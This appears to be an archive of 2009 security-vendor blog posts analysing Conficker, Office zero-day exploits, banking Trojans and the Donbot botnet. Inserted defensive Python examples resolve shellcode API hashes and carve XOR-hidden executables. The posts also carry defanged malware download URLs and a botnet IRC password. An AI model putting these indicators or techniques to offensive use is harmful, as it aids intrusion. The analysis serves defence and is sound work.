Archive for the 'Exploit Research' Category

Dumb Malware Authors Cause More Damage Than Smart Ones

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.
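One way to turn this observation into a routine triage check, as an added Python example (not code from the post): pull printable strings out of a sample the way the strings tool does, parse any OLE DB connection string found, and report whether it ships credentials, redacting them in the output. The sample bytes and the PLACEHOLDER_ values are constructed here; nothing in them comes from the actual Trojan.

```python
import re

# Constructed stand-in for a sample's bytes: some non-printable junk around an
# embedded OLE DB connection string (all credential values are placeholders).
SAMPLE_BINARY = (
    b"\x00\x01\x02MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"
    b"Provider=SQLOLEDB.1;Password=PLACEHOLDER_PW;Persist Security Info=True;"
    b"User ID=PLACEHOLDER_USER;Initial Catalog=PLACEHOLDER_DB;"
    b"Data Source=sql.example.invalid;Packet Size=10000\x00"
    b"\x7f\x80\x81kernel32.dll\x00"
)

# Connection-string keys that carry secrets (lower-cased for comparison).
CREDENTIAL_KEYS = {"password", "pwd", "user id", "uid"}


def extract_strings(data: bytes, min_len: int = 8):
    """Return printable-ASCII runs of at least min_len bytes, like 'strings'."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def parse_connection_string(s: str) -> dict:
    """Split an OLE DB / ADO style 'Key=Value;Key=Value' string into a dict
    with lower-cased keys; parts without '=' are ignored."""
    fields = {}
    for part in s.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def find_embedded_db_credentials(data: bytes):
    """One finding per embedded connection string: where it points, whether it
    carries credentials, and a redacted copy safe to put in a report."""
    findings = []
    for s in extract_strings(data):
        if "provider=" not in s.lower():
            continue
        fields = parse_connection_string(s)
        has_creds = bool(CREDENTIAL_KEYS & set(fields))
        redacted = {k: ("<redacted>" if k in CREDENTIAL_KEYS else v)
                    for k, v in fields.items()}
        findings.append({
            "data_source": fields.get("data source"),
            "has_credentials": has_creds,
            "fields": redacted,
        })
    return findings


if __name__ == "__main__":
    for finding in find_embedded_db_credentials(SAMPLE_BINARY):
        print(finding)
```

The point of the redaction step is that the finding can go straight into a ticket or a takedown request without copying the stolen-data store's password around; the data source alone is enough for the follow-up.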

Yes, it is just another password-stealing Trojan. No need to get too excited. :) And, yes, we already detect this malware–as PWS-Banker.gen.i.

New McAfee Whitepaper on Browser Attacks

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Urban ‘Attack’ on Infrastructure

Supervisory Control and Data Acquisition, or SCADA, stands for large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

Stories about intruders who damage the power grid or any other key SCADA infrastructure frequently make the headlines. In the past, as in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

Since then, our enemies have changed. The Wall Street Journal reported in April that, according to a federal audit, critical infrastructure facilities in the U.S. power industry had been compromised with software that would allow the attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a senior U.S. intelligence official said at the time. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

Last week, I discovered a video posted on YouTube in November 2008. We can see two guys hacking a central light system and then playing space invaders on it!

I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed on less secure operating systems (Windows), are connected to other networks (including the Internet), and cannot be easily updated and rebooted.

For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.

Hacking Exposed at RSA

RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

For those who were not among the anointed who attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

Conficker on the prowl after the 1st…

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home, rather than the HTTP rendezvous, to start its latest escapade. In this case, the infected host is contacted initially by another host over an ad-hoc P2P connection, kind of like an alarm clock. Then, after hitting the snooze button for a period of several hours, the communication begins again, this time starting from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (that is, the update) may go unseen, or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address, and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the screenshots below:

We have also seen some hosts serving up a Waledac payload. (Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time, however, it is closer to the original patch, so as to elude detection. (Note: our McAfee Conficker Detection tool is in the process of being redesigned to allow detection of the latest variants.)

There are also two other notes of interest. The first is that we have a new deadline to watch: on May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Is this just a test from the Conficker crew, who are serving up Waledac incidentally? Or is this done for other self-serving reasons (for example, diverting attention)? Maybe it’s just a deadline for a rented botnet? These are interesting questions that I am sure the security community at large is wondering about.

Second, when an infected host resolves an HTTP rendezvous domain name, it compares the resolved IP with the list of IPs it has already queried; if the new IP is in the list, it moves on to the next domain in its list.

Of course, we will update if anything else comes along…

Drive-by-Download Du Jour

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

 FakeAlert-BY

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

New Conficker Variant

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability is available here.

For measures to protect yourself and your organization against Conficker, please visit:

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

Happy Easter: Egg-Hunting With New PowerPoint Zero-Day Exploit

As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint zero-day exploits that are once again being used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, as yet unpatched hole in Microsoft PowerPoint and cause it to execute code planted by the attackers. This blog post shows how the shellcode works and what it does right after an innocent victim opens the malicious file - if the attacker gets their way, of course!

For size reasons, the code is split into several parts that are scattered throughout the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to locate the remaining part of the shellcode in memory. To do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (which is a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transferred to the code following it.

Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0x30000000). Another loop then XOR-decodes a further part of the shellcode into that memory location and branches to it. Once decoded, a filename (“fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are imported by parsing OS-internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

As shellcode mostly needs to fit into a size-limited block of memory, this exploit not only splits its code into several parts so that it works reliably, it also uses 32-bit hashes of the API functions to import, rather than a list of function names, which would consume more space. At run time, the shellcode’s ROR-13 hashing algorithm iterates over every exported API function name and compares the result against its given list. Applying the same technique when statically analyzing the shellcode, the list of imported functions becomes readable. The now-readable list does not contain any function that would indicate the shellcode downloads a file; rather, it drops one embedded in the PowerPoint file and executes it.

A hex search for typical indicators of an executable file, such as an “MZ” or “PE” header, yields no results, which is not astonishing at all. Of course, the attackers who built the exploit intended to prevent their cover being blown by something as obvious as an executable embedded in a PowerPoint presentation file! Looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

The loop decrypts a given memory block using an 8-bit XOR key. By incorporating the same decryption loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ and a PE header surface in the hex editor. It’s the embedded executable that was assumed to hide between the PowerPoint “slides” - the malware can finally be extracted.
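The two analysis steps described above, resolving the ROR-13 import hashes and brute-forcing the 8-bit XOR key to surface the embedded executable, as an added Python example. This is neither the analyst's script from the post nor any code from the exploit; it assumes the classic rotate-then-add ROR-13 variant over the ASCII name without the terminating NUL (other shellcode uses slightly different variants, so check the disassembly before trusting the table), and the export-name list, the hash list and the fake "presentation" bytes are constructed here purely to exercise the code.

```python
MASK32 = 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Classic ROR-13 API-name hash: rotate the running value right by 13 bits,
    then add the next character. Assumed variant; the NUL is not included."""
    h = 0
    for ch in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & MASK32
        h = (h + ch) & MASK32
    return h


def resolve_api_hashes(hashes, export_names):
    """Map 32-bit hashes lifted from the shellcode back to export names, the
    same way the shellcode itself walks a library's export table."""
    table = {ror13_hash(n): n for n in export_names}
    return [table.get(h, "unknown(0x%08X)" % h) for h in hashes]


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR over a buffer (its own inverse)."""
    return bytes(b ^ key for b in data)


def find_xor_encoded_pe(blob: bytes):
    """Try every single-byte XOR key and return (key, offset) of the first
    decoded MZ header whose e_lfanew field points at a 'PE\\0\\0' signature.
    Checking e_lfanew avoids false hits on text that merely decodes to 'MZ'."""
    for key in range(1, 256):
        dec = xor_bytes(blob, key)
        off = dec.find(b"MZ")
        while off != -1:
            if off + 0x40 <= len(dec):
                e_lfanew = int.from_bytes(dec[off + 0x3C:off + 0x40], "little")
                pe = off + e_lfanew
                if (e_lfanew >= 0x40 and pe + 4 <= len(dec)
                        and dec[pe:pe + 4] == b"PE\x00\x00"):
                    return key, off
            off = dec.find(b"MZ", off + 1)
    return None


# --- constructed sample data (not taken from any real file) ---
KERNEL32_EXPORTS = ["CloseHandle", "CreateFileA", "ExitProcess", "GetProcAddress",
                    "LoadLibraryA", "VirtualAlloc", "WinExec", "WriteFile"]
# Hash list as it would be lifted from the disassembly; built from names here,
# plus one value that resolves to nothing in our export list.
SAMPLE_HASHES = [ror13_hash(n) for n in
                 ("LoadLibraryA", "CreateFileA", "WriteFile", "WinExec")] + [0xDEADBEEF]


def build_fake_pe_stub() -> bytes:
    """Minimal MZ/PE header skeleton standing in for the embedded executable."""
    dos = bytearray(64)                                 # IMAGE_DOS_HEADER
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = (0x80).to_bytes(4, "little")       # e_lfanew -> 0x80
    return bytes(dos) + b"\x00" * (0x80 - 0x40) + b"PE\x00\x00" + b"\x4C\x01"


FILLER = b"Lorem ipsum dolor sit amet, consectetur adipiscing elit. " * 4
XOR_KEY = 0x5A
# Fake document: text, then the XOR-encoded executable, then more text.
SAMPLE_DOC = FILLER + xor_bytes(build_fake_pe_stub(), XOR_KEY) + FILLER

if __name__ == "__main__":
    print(resolve_api_hashes(SAMPLE_HASHES, KERNEL32_EXPORTS))
    print(find_xor_encoded_pe(SAMPLE_DOC))
```

In practice you feed resolve_api_hashes the export names of the real kernel32.dll (and any other library the shellcode loads), and once find_xor_encoded_pe reports a key and offset you carve from that offset and decode with the same key to obtain the dropped file for detection work.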

McAfee VirusScan products detect this threat as Exploit-PPT.k trojan; McAfee Anti-Malware Gateway Edition (formerly Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

Donbot - Joining The Club of Million Dollar Botnets

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild. Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe. It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as Generic Rootkit.g trojan. It then establishes an outbound connection to a remote IRC server using the following credentials:

  • PASS h4xg4ng
  • NICK [00-USA-XP-9215671]
  • USER SP2-ojd, followed by the name of the infected computer.

This worm does indeed exploit the MS08-067 vulnerability, and it uses a download-and-execute shellcode that behaves identically to Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode that loads API libraries (e.g., urlmon.dll) and calls URLDownloadToFile() to download malware from already infected systems onto new targets. Unlike Conficker, which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

ShellCode

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself. The Metasploit framework has become a popular platform for security tools development and automation. As we can see, the latest version of Metasploit is used not only by whitehats for vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is no exception: it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as DCERPC service connection testing code located in the “client.rb” module. By using these routines, the new worm can conveniently determine which operating system and service pack it is targeting, to achieve a better infection success rate. The order in which W32/IRCbot.gen.a sends the attack packets is identical to that of Metasploit’s MS08-067 module (ms08_067_netapi.rb):

WireShark

Both Conficker and W32/IRCbot.gen.a use open source tools to their advantage to make their work much easier.

We went on to investigate additional sites that the worm connects to and the payload that it tries to download. Packet sniffer logs show that it accesses at least two other remote servers:

  • hxxp://98.1[infected].42:443/n
  • hxxp://74.2[infected].90:88/jueo.exe

While the first server showed no activity at the time of our research, the second server was still active and hosts additional malware that is installed on infected machines:

VirusTotal

Well, hello Donbot! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C), detected generically as Generic.dx, appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. With a few exceptions, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet. While other botnets, namely Cutwail and Rustock, continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets, as they might not get another chance like the MS08-067 exploit for a long time.

This also serves as yet another reminder that there could well be many computers on the Internet that still do not have the latest security updates installed, more than 5 months after the release of the MS08-067 patch.

Next Up: Office Exploits Reloaded

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detect this threat as Exploit-PPT.k trojan using the 5573 DATs, to be released on the same day.

As with most other document exploits, these PowerPoint files install malicious trojans in the background but display an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

  • fssm32.exe: 428,032 bytes (Muster.c trojan)
  • IEUpd.exe: 45,056 bytes (Muster.c trojan)
  • setup.exe: 131,072 bytes (Muster.c trojan)
  • PeerCM.exe: 80,666 bytes (Generic BackDoor.u trojan)
  • ws2_42.dll: 106,740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Show files with the “.pps” extension. Such files typically open in full-screen mode and hide the applications running on the desktop, such as system monitoring tools, that could give the victim any clue to the dodgy installation of trojans.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

The most common vulnerabilities used by malevolent URLs in China

Every day there are thousands of websites that have been injected with malicious code, and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This post introduces the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, is easy to use, and is free. Multiple buffer overflows in Baofeng2 Storm allow for the downloading and execution of files. Its CVE number is CVE-2007-4816.
Reference:
http://www.baofeng.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, flash search and so on. Vulnerabilities in BaiduBar.dll in Baidu Soba allow for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. Its CVE number is CVE-2007-4105.
Reference:
http://bar.baidu.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. Because people can find more and more valuable resources to download via Xunlei Web, it has a great many users. Buffer overflows in Xunlei Web before version 5.6.3.44 allow the execution of arbitrary code. Its CVE number is CVE-2007-5064.
Reference:
http://dl.xunlei.com/index.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software based on P2P streaming techniques. It’s very popular in China. Buffer overflows in PowerPlayer.dll in PPStream before version 2.0.1.3829 allow the execution of arbitrary code. Its CVE number is CVE-2007-4748.
Reference:
http://www.ppstream.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a free gaming platform that covers all the related fields and areas of network games. It offers nearly one hundred kinds of games, including card games, casual games, large-scale online games and so on. Buffer overflows in GLChat.ocx of the OurGame Chat module, in the ConnectAndEnterRoom() method, allow the execution of arbitrary code. Its CVE number is CVE-2007-5722.
Reference:
http://www.ourgame.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool, similar to a PDF reader. Buffer overflows in Ultra Star Reader allow the execution of arbitrary code. Its CVE number is CVE-2007-5807.
Reference:
http://www.ssreader.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is a media player with sound-effect enhancing functionality. Vulnerabilities in JetFlExt.dll in JetAudio version 7.0.3 allow the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:
http://www.jetaudio.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as HTTP, FTP and BitTorrent. Buffer overflows in pplayer.dll in Xunlei Thunder allow the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:
http://www.xunlei.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

More Comments Regarding Conficker

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

W32/Conficker: Much Ado About Nothing?

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms has turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

McAfee Debuts ‘Combating Threats’ Series

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

New Excel Trojan Hits the Net

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004 and 2008 for Mac, and Excel Viewer/Excel Viewer 2003.

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When successful, it installs a backdoor that attempts to connect to a remote site on port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

What Have We Learned From Past Virus Infections?

The year 2009 has so far been a hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the user’s suspect workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

W32/Conficker infecting via SMB

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry ;-)

Malware Riding on the Tides of the Economic Crisis

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want to fool exactly those people trying to save some money these days. Spam mails promoting bargains that supposedly help in the recession are hitting inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

New BackDoor Attacks Using PDF Documents

Needless to further remind everyone, zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-087) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

